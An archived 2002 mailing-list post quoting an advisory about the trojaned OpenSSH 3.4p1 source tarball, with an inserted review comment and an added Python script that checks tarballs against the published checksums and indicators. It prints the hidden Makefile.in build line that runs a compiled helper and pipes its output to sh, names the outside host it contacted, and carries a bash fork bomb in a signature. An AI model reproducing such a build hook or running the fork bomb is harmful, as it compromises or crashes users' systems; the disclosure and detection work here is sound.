
[Savannah-hackers] Re: OpenSSH 3.4p1 trojaned


From: Jeff Bailey
Subject: [Savannah-hackers] Re: OpenSSH 3.4p1 trojaned
Date: Thu, 1 Aug 2002 11:57:58 -0700
User-agent: Mutt/1.3.28i

The Debian package isn't affected, either source or binary.

On Thu, Aug 01, 2002 at 02:55:41PM -0400, Mark H. Weaver wrote:
> http://lwn.net/Articles/6524/
> 
> [...]
> 
> Trojan horse in OpenSSH 3.4p1 source distribution
> 
>    From:      Mikael Olsson <address@hidden>
>    To:        address@hidden
>    Subject:   openssh-3.4p1.tar.gz distribution recently trojaned
>    Date:      Thu, 01 Aug 2002 13:20:47 +0200
> 
> 
> From
> [27]http://docs.freebsd.org/cgi/getmsg.cgi?fetch=394609+0+current/freebsd-security
> 
> ----- Forwarded message from Edwin Groothuis <address@hidden> -----
> 
> Date: Thu, 1 Aug 2002 16:55:51 +1000
> From: Edwin Groothuis <address@hidden>
> To: address@hidden
> Subject: openssh-3.4p1.tar.gz trojaned
> 
> Greetings,
> 
> Just want to inform you that the OpenSSH package on ftp.openbsd.org
> (and probably all its mirrors now) is trojaned:
> 
>     
> [28]ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz
> 
> The OpenBSD people have been informed about it (via email to
> address@hidden and via irc.openprojects.org/#openbsd)
> 
> 
> The changed files are openssh-3.4p1/openbsd-compat/Makefile.in:
>  all: libopenbsd-compat.a
> +       @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh
> ./bf-test.out &
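Review bot: the added recipe line under `all:` makes the build itself execute code: it compiles bf-test.c, runs the resulting binary, and hands its output to `sh` in the background, and the leading `@` stops make from echoing the command, so nothing appears in the build output. Building libopenbsd-compat.a needs none of this; the line should be dropped, and any tree that contains it or bf-test.c should be treated as modified and not built.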
> 
> bf-test.c[1] is nothing more than a wrapper which generates a
> shell-script[2] which compiles itself and tries to connect to a
> server running on 203.62.158.32:6667 (web.snsonline.net).
> 
> [1] [29]http://www.mavetju.org/~edwin/bf-test.c
> [2] [30]http://www.mavetju.org/~edwin/bf-output.sh
> 
> This is the md5 checksum of the openssh-3.4p1.tar.gz in the FreeBSD
> ports system:
>     MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8
> 
> This is the md5 checksum of the trojaned openssh-3.4p1.tar.gz:
>     MD5 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57
> 
> Edwin
> 
> --
> Edwin Groothuis      |            Personal website: [31]http://www.MavEtJu.org
> address@hidden    |    Weblog: [32]http://www.mavetju.org/weblog/weblog.php
> bash$ :(){ :|:&};:   | Interested in MUDs? [33]http://www.FatalDimensions.org/
>    __________________________________________
> 
>      Trojan horse in OpenSSH 3.4p1 source distribution
>    (Posted Aug 01, 2002 15:07 UTC (Thu) by craighagan) ([35]Post reply)
> 
>    This appears to be a FreeBSD ports thing. I build from
>    sources downloaded from the openssh website within 24 hours
>    of the release. I've double-checked said sources and
>    do *not* see either the Makefile.in modification
>    nor the bf-test.c source via find.
> 
>    I recommend other folks check their sources so that
>    either the ports origin -- or a hack at openssh's distribution
>    point can be confirmed.
> 
>      Trojan horse in OpenSSH 3.4p1 source distribution
>    (Posted Aug 01, 2002 15:08 UTC (Thu) by craighagan) ([36]Post reply)
> 
>    Silly me. I forgot that -ports ftp's the software upon build.
> 
>      Trojan horse in OpenSSH 3.4p1 source distribution
>    (Posted Aug 01, 2002 16:22 UTC (Thu) by erat) ([37]Post reply)
> 
>    I built 3.4p1 last night from a tarball downloaded from openssh.com.
>    No trojan found, and the checksum matched the "good" checksum from the
>    security alert.
> 
>                      Copyright (c) 2002, Eklektix, Inc.
>            Linux (R) is a registered trademark of Linus Torvalds
>                  Web hosting provided by [38]Rackspace.com.
> 
> References
> 
>    1. http://lwn.net/
>    2. http://php.lwn.net/corp/advertise/text/visit.php3?adid=382
>    3. http://php.lwn.net/mediakit/index.php3?s=t
>    4. http://lwn.net/login
>    5. http://lwn.net/newaccount
>    6. http://lwn.net/Articles/5712/
>    7. http://lwn.net/Articles/5052/
>    8. http://lwn.net/Articles/4553/
>    9. http://lwn.net/Articles/4151/
>   10. http://lwn.net/Articles/3668/
>   11. http://lwn.net/Articles/6524/?format=printable
>   12. http://lwn.net/
>   13. http://lwn.net/current/
>   14. http://lwn.net/Archives/
>   15. http://lwn.net/security
>   16. http://www.linuxcalendar.com/
>   17. http://old.lwn.net/Distributions/
>   18. http://old.lwn.net/Gallery/
>   19. http://lwn.net/KernelPatches/
>   20. http://old.lwn.net/stocks
>   21. http://old.lwn.net/
>   22. http://lwn.net/op/About.lwn/
>   23. http://php.lwn.net/corp/donate/
>   24. http://lwn.net/mediakit
>   25. http://lwn.net/headlines/
>   26. http://lwn.net/op/Privacy.lwn/
>   27. http://docs.freebsd.org/cgi/getmsg.cgi?fetch=394609+0+current/freebsd-security
>   28. ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz
>   29. http://www.mavetju.org/~edwin/bf-test.c
>   30. http://www.mavetju.org/~edwin/bf-output.sh
>   31. http://www.MavEtJu.org/
>   32. http://www.mavetju.org/weblog/weblog.php
>   33. http://www.FatalDimensions.org/
>   34. http://lwn.net/login
>   35. http://lwn.net/Articles/6547/comment
>   36. http://lwn.net/Articles/6550/comment
>   37. http://lwn.net/Articles/6560/comment
>   38. http://www.rackspace.com/
> 

-- 
I reincarnated for this?
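
An added example, not part of the original message or of OpenSSH: a Python check that applies the indicators quoted above (the two MD5 digests, the `bf-test` line in `openbsd-compat/Makefile.in`, and the `bf-test.c` file) to a tarball without unpacking or building it. The function names and the small sample archive are constructed for illustration.

```python
import hashlib
import io
import tarfile

# Digests quoted in the forwarded message (MD5 is what the message published).
GOOD_MD5 = "459c1d0262e939d6432f193c7a4ba8a8"
TROJANED_MD5 = "3ac9bc346d736b4a51d676faa2a08a57"


def classify_digest(data: bytes) -> str:
    """Compare the tarball's MD5 with the two digests from the message."""
    digest = hashlib.md5(data).hexdigest()
    if digest == GOOD_MD5:
        return "known-good"
    if digest == TROJANED_MD5:
        return "known-trojaned"
    return "unknown"  # neither digest: fall back to the content scan


def scan_tarball(data: bytes) -> list:
    """Read members in place (nothing is extracted or executed) and report
    the two content indicators the message describes."""
    findings = []
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tar:
        for member in tar:
            if not member.isfile():
                continue
            name = member.name
            if name.rsplit("/", 1)[-1] == "bf-test.c":
                findings.append(f"unexpected file: {name}")
            elif name.endswith("openbsd-compat/Makefile.in"):
                text = tar.extractfile(member).read().decode("latin-1")
                for lineno, line in enumerate(text.splitlines(), 1):
                    if "bf-test" in line:
                        findings.append(f"{name}:{lineno}: {line.strip()}")
    return findings


def build_sample(makefile_in: bytes, extra: dict) -> bytes:
    """Constructed test input: a tiny gzip'd tar shaped like the source tree."""
    files = {"openssh-3.4p1/openbsd-compat/Makefile.in": makefile_in, **extra}
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, body in files.items():
            info = tarfile.TarInfo(name)
            info.size = len(body)
            tar.addfile(info, io.BytesIO(body))
    return buf.getvalue()
```

For a real download, read the file's bytes and pass them to both functions; an "unknown" digest with an empty scan result still means the tarball matches neither published checksum.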



